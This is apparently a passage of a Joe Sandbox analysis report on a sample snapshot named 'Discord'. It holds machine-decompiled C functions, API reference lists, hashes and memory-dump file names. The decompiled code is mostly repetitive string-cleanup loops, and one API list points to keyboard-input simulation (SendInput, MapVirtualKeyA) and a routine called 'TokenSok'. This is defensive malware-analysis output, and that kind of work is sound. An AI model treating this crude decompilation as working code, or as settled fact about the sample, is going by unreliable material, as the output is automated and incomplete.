_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF47
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 6DE8BF59
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 6DE8BF6B
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 6DE8BF7D
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 6DE8BF8F
_Unwind_Resume.LIBGCC_S_DW2-1(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF98

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeUnwind_
String ID:
API String ID: 6079418-0
Opcode ID: 45d23f6c782f9a281d84e8ec183ab8bb76e0b57ef27cbd7dd39a03ad5a50727b
Instruction ID: cbb61c8e1c8620c416e45bab21ce46aaef8cf12fe1f698a1bdcbccbb6a1ef0e7
Opcode Fuzzy Hash: 45d23f6c782f9a281d84e8ec183ab8bb76e0b57ef27cbd7dd39a03ad5a50727b
Instruction Fuzzy Hash: A9711FB48499148FC715DF14DD8499DF3F8EFA8720F11869DE989E7261DB301A84CF51

Uniqueness

Uniqueness Score: -1.00%

Function 6DE9402C Relevance: 48.2, APIs: 32, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E6DE9402C() {
				intOrPtr _t62;
				intOrPtr _t92;
				void* _t93;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr* _t129;

				_t127 = _t62;
				 *_t129 = _t128;
				L6DE8DD48();
				_push( *((intOrPtr*)(_t93 + 0x80)));
				 *_t129 = _t128;
				L6DE8DD48();
				_push( *((intOrPtr*)(_t93 + 0x7c)));
				while(1) {
					 *_t129 = _t128;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t93 + 0x78)));
					 *_t129 = _t128;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t93 + 0x74)));
					 *_t129 = _t128;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t93 + 0x70)) - 0xc);
					 *_t129 = _t128;
					L6DE8DD48();
					 *_t129 = _t128;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t93 + 0x68)));
					 *_t129 = _t128;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t93 + 0x64)));
					 *_t129 = _t128;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t93 + 0x60)));
					 *_t129 = _t128;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t93 + 0x5c)));
					 *_t129 = _t128;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t93 + 0x58)));
					 *_t129 = _t128;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t93 + 0x54)));
					 *_t129 = _t128;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t93 + 0x50)) - 0xc);
					 *_t129 = _t128;
					L6DE8DD48();
					_push(_t126);
					 *_t129 = _t128;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t93 + 0x48)));
					 *_t129 = _t128;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t93 + 0x44)));
					 *_t129 = _t128;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t93 + 0x40)));
					 *_t129 = _t128;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t93 + 0x3c)));
					 *_t129 = _t128;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t93 + 0x38)));
					 *_t129 = _t128;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t93 + 0x34)));
					 *_t129 = _t128;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t93 + 0x30)) - 0xc);
					 *_t129 = _t128;
					L6DE8DD48();
					_push(_t126);
					 *_t129 = _t128;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t93 + 0x28)));
					 *_t129 = _t128;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t93 + 0x24)));
					 *_t129 = _t128;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t93 + 0x20)));
					 *_t129 = _t128;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t93 + 0x1c)));
					 *_t129 = _t128;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t93 + 0x18)));
					 *_t129 = _t128;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t93 + 0x14)));
					 *_t129 = _t128;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t93 + 0x10)) - 0xc);
					_t92 =  *((intOrPtr*)(_t93 + 0xc));
					 *_t129 = _t128;
					L6DE8DD48();
					_push(_t126);
					 *_t129 = _t128;
					L6DE8DD48();
					_push(_t92);
					 *_t129 = _t127;
					L6DE8EBA0();
					_t127 = _t92;
				}
			}

0x6de9402c
0x6de9403a
0x6de94040
0x6de94045
0x6de94049
0x6de9404f
0x6de94054
0x6de94055
0x6de94058
0x6de9405e
0x6de94063
0x6de94067
0x6de9406d
0x6de94072
0x6de94076
0x6de9407c
0x6de94081
0x6de94085
0x6de9408b
0x6de94094
0x6de9409a
0x6de9409f
0x6de940a3
0x6de940a9
0x6de940ae
0x6de940b2
0x6de940b8
0x6de940bd
0x6de940c1
0x6de940c7
0x6de940cc
0x6de940d0
0x6de940d6
0x6de940db
0x6de940df
0x6de940e5
0x6de940ea
0x6de940ee
0x6de940f4
0x6de940f9
0x6de940fd
0x6de94103
0x6de94108
0x6de9410c
0x6de94112
0x6de94117
0x6de9411b
0x6de94121
0x6de94126
0x6de9412a
0x6de94130
0x6de94135
0x6de94139
0x6de9413f
0x6de94144
0x6de94148
0x6de9414e
0x6de94153
0x6de94157
0x6de9415d
0x6de94162
0x6de94166
0x6de9416c
0x6de94171
0x6de94175
0x6de9417b
0x6de94180
0x6de94184
0x6de9418a
0x6de9418f
0x6de94193
0x6de94199
0x6de9419e
0x6de941a2
0x6de941a8
0x6de941ad
0x6de941b1
0x6de941b7
0x6de941bc
0x6de941c0
0x6de941c6
0x6de941cb
0x6de941cf
0x6de941d5
0x6de941da
0x6de941de
0x6de941e4
0x6de941e9
0x6de941ea
0x6de941ed
0x6de941f3
0x6de941f8
0x6de941fc
0x6de94202
0x6de94207
0x6de94208
0x6de9420b
0x6de94210
0x6de94210

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE94040
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000), ref: 6DE9404F
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000), ref: 6DE9405E
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000), ref: 6DE9406D
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000), ref: 6DE9407C
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000,00000000,00000000,00000000), ref: 6DE9408B
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,00000000,00000000,00000000,00000000), ref: 6DE9409A
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,?,00000000,00000000,00000000,00000000), ref: 6DE940A9
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 6DE940B8
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 6DE940C7
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 6DE940D6
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 6DE940E5
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 6DE940F4
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 6DE94103
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 6DE94112
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 6DE94121
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 6DE94130
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 6DE9413F
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6DE9414E
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 6DE9415D
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE9416C
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE9417B
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE9418A
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6DE94199
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 6DE941A8
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 6DE941B7
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6DE941C6
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 6DE941D5
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE941E4
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE941F3
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE94202
_Unwind_Resume.LIBGCC_S_DW2-1(00000000), ref: 6DE9420B

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeUnwind_
String ID:
API String ID: 6079418-0
Opcode ID: 76135c720b9445248530da1bb39b21273008dfdec8b90d884feb13245a0814b9
Instruction ID: 218cff6c23936890635ebb8b30271ac73253a4fb2578ba80a4a4e86ae9069600
Opcode Fuzzy Hash: 76135c720b9445248530da1bb39b21273008dfdec8b90d884feb13245a0814b9
Instruction Fuzzy Hash: B7611EB4049900CFC744EF18E9C4869F7E9FF98660F22864DED9ACB266DB309944CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6DE94030 Relevance: 46.7, APIs: 31, Instructions: 156
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E6DE94030() {
				intOrPtr _t60;
				intOrPtr _t89;
				void* _t90;
				intOrPtr _t123;
				intOrPtr _t124;
				intOrPtr* _t125;

				_t123 = _t60;
				 *_t125 = _t124;
				L6DE8DD48();
				_push( *((intOrPtr*)(_t90 + 0x7c)));
				while(1) {
					 *_t125 = _t124;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t90 + 0x78)));
					 *_t125 = _t124;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t90 + 0x74)));
					 *_t125 = _t124;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t90 + 0x70)) - 0xc);
					 *_t125 = _t124;
					L6DE8DD48();
					 *_t125 = _t124;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t90 + 0x68)));
					 *_t125 = _t124;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t90 + 0x64)));
					 *_t125 = _t124;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t90 + 0x60)));
					 *_t125 = _t124;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t90 + 0x5c)));
					 *_t125 = _t124;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t90 + 0x58)));
					 *_t125 = _t124;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t90 + 0x54)));
					 *_t125 = _t124;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t90 + 0x50)) - 0xc);
					 *_t125 = _t124;
					L6DE8DD48();
					_push(_t122);
					 *_t125 = _t124;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t90 + 0x48)));
					 *_t125 = _t124;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t90 + 0x44)));
					 *_t125 = _t124;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t90 + 0x40)));
					 *_t125 = _t124;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t90 + 0x3c)));
					 *_t125 = _t124;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t90 + 0x38)));
					 *_t125 = _t124;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t90 + 0x34)));
					 *_t125 = _t124;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t90 + 0x30)) - 0xc);
					 *_t125 = _t124;
					L6DE8DD48();
					_push(_t122);
					 *_t125 = _t124;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t90 + 0x28)));
					 *_t125 = _t124;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t90 + 0x24)));
					 *_t125 = _t124;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t90 + 0x20)));
					 *_t125 = _t124;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t90 + 0x1c)));
					 *_t125 = _t124;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t90 + 0x18)));
					 *_t125 = _t124;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t90 + 0x14)));
					 *_t125 = _t124;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t90 + 0x10)) - 0xc);
					_t89 =  *((intOrPtr*)(_t90 + 0xc));
					 *_t125 = _t124;
					L6DE8DD48();
					_push(_t122);
					 *_t125 = _t124;
					L6DE8DD48();
					_push(_t89);
					 *_t125 = _t123;
					L6DE8EBA0();
					_t123 = _t89;
				}
			}

0x6de94030
0x6de94049
0x6de9404f
0x6de94054
0x6de94055
0x6de94058
0x6de9405e
0x6de94063
0x6de94067
0x6de9406d
0x6de94072
0x6de94076
0x6de9407c
0x6de94081
0x6de94085
0x6de9408b
0x6de94094
0x6de9409a
0x6de9409f
0x6de940a3
0x6de940a9
0x6de940ae
0x6de940b2
0x6de940b8
0x6de940bd
0x6de940c1
0x6de940c7
0x6de940cc
0x6de940d0
0x6de940d6
0x6de940db
0x6de940df
0x6de940e5
0x6de940ea
0x6de940ee
0x6de940f4
0x6de940f9
0x6de940fd
0x6de94103
0x6de94108
0x6de9410c
0x6de94112
0x6de94117
0x6de9411b
0x6de94121
0x6de94126
0x6de9412a
0x6de94130
0x6de94135
0x6de94139
0x6de9413f
0x6de94144
0x6de94148
0x6de9414e
0x6de94153
0x6de94157
0x6de9415d
0x6de94162
0x6de94166
0x6de9416c
0x6de94171
0x6de94175
0x6de9417b
0x6de94180
0x6de94184
0x6de9418a
0x6de9418f
0x6de94193
0x6de94199
0x6de9419e
0x6de941a2
0x6de941a8
0x6de941ad
0x6de941b1
0x6de941b7
0x6de941bc
0x6de941c0
0x6de941c6
0x6de941cb
0x6de941cf
0x6de941d5
0x6de941da
0x6de941de
0x6de941e4
0x6de941e9
0x6de941ea
0x6de941ed
0x6de941f3
0x6de941f8
0x6de941fc
0x6de94202
0x6de94207
0x6de94208
0x6de9420b
0x6de94210
0x6de94210

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000), ref: 6DE9404F
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000), ref: 6DE9405E
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000), ref: 6DE9406D
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000), ref: 6DE9407C
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000,00000000,00000000,00000000), ref: 6DE9408B
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,00000000,00000000,00000000,00000000), ref: 6DE9409A
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,?,00000000,00000000,00000000,00000000), ref: 6DE940A9
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 6DE940B8
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 6DE940C7
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 6DE940D6
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 6DE940E5
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 6DE940F4
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 6DE94103
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 6DE94112
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 6DE94121
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 6DE94130
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 6DE9413F
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6DE9414E
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 6DE9415D
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE9416C
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE9417B
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE9418A
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6DE94199
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 6DE941A8
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 6DE941B7
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6DE941C6
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 6DE941D5
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE941E4
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE941F3
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE94202
_Unwind_Resume.LIBGCC_S_DW2-1(00000000), ref: 6DE9420B

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeUnwind_
String ID:
API String ID: 6079418-0
Opcode ID: b557b08b71d55d9e77f32d3eb42f2e9ca0626d8318a894b0dc88bc6d725b780c
Instruction ID: 38a46b4d0d3c8c25fb1a239bcc4f1dd17dfbc175d4a268a0c683a619a665ae55
Opcode Fuzzy Hash: b557b08b71d55d9e77f32d3eb42f2e9ca0626d8318a894b0dc88bc6d725b780c
Instruction Fuzzy Hash: 5A510EB40499008FC345EF18E9C4869F7E9FF98660B22864DED9ACB266DB309944CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6DE83239 Relevance: 43.8, APIs: 29, Instructions: 339keyboardCOMMON

Download Yara Rule

APIs

_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE83253
_ZNSsC1ERKSs.LIBSTDC++-6 ref: 6DE8326B
_ZNSsC1ERKSs.LIBSTDC++-6 ref: 6DE83280
_ZNSsC1ERKSs.LIBSTDC++-6 ref: 6DE83295
_ZNSsC1ERKSs.LIBSTDC++-6 ref: 6DE832AA
_Z8TokenSokSsSsSsSs.DRES1 ref: 6DE832E9
_ZNSs4swapERSs.LIBSTDC++-6 ref: 6DE832FD
_ZNKSs7compareEPKc.LIBSTDC++-6 ref: 6DE8338A
SendInput.USER32 ref: 6DE83514
_ZNSsC1ERKSs.LIBSTDC++-6 ref: 6DE8353D
_ZNSs6appendEPKcj.LIBSTDC++-6 ref: 6DE83556
_ZNSs6appendERKSs.LIBSTDC++-6 ref: 6DE83569
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE83594
_ZNSs6appendEPKcj.LIBSTDC++-6 ref: 6DE835B0
_ZNSs12_S_constructEjcRKSaIcE.LIBSTDC++-6 ref: 6DE835DB
_ZNSs4swapERSs.LIBSTDC++-6 ref: 6DE835EB
_Z7setCTetPKc.DPUB1 ref: 6DE83644
MapVirtualKeyA.USER32 ref: 6DE836BD
MapVirtualKeyA.USER32 ref: 6DE836F8
MapVirtualKeyA.USER32 ref: 6DE8372A
SendInput.USER32 ref: 6DE8374D
_Z3CokP6HWND__S0_.DFO1 ref: 6DE83774
MapVirtualKeyA.USER32 ref: 6DE837F9
MapVirtualKeyA.USER32 ref: 6DE83834
MapVirtualKeyA.USER32 ref: 6DE83866
MapVirtualKeyA.USER32 ref: 6DE83895
MapVirtualKeyA.USER32 ref: 6DE838C4
SendInput.USER32 ref: 6DE838E7
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE8391E
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE83996
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE839A9
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE839C6
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE839D9
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE839F6

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
